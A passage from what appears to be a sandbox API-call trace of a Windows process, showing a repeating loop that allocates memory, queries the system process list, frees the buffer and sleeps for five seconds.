ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.673] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.674] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.675] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.675] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.679] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.680] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.682] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.683] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.683] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.684] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.684] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.690] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.691] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.693] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.693] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.694] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.694] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.695] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.701] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.702] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.704] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.705] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.706] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.706] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.706] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.710] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.711] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.713] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.713] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.715] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.715] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.716] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.720] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.721] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.723] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.723] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.724] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.724] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.725] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.729] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.731] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.733] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.734] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.735] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.735] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.735] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.740] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.741] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.742] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.743] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.743] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.744] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.744] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.749] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.750] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.752] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.752] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.753] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.754] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.754] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.758] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.759] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.761] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.761] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.764] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.764] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.764] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.771] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.772] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.773] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.774] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.775] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.775] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.775] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.780] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.781] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.783] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.783] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.784] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.784] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.785] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.791] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.791] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.793] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.794] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.795] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.795] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.795] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.799] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.800] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.802] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.802] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.803] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.803] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.803] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.808] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.809] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.811] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.811] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.812] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.812] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.812] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.817] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.818] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.820] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.820] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.821] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.821] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.822] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.826] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.827] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.829] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.829] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.830] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.830] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.831] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.837] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.838] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.839] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.840] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.841] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.841] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.841] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.848] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.849] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.850] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.851] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.852] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.852] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.852] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.857] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.858] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.860] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.860] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.861] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.861] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.861] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0237.866] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0237.867] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0237.869] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0237.869] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0237.870] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0237.870] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0237.870] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, 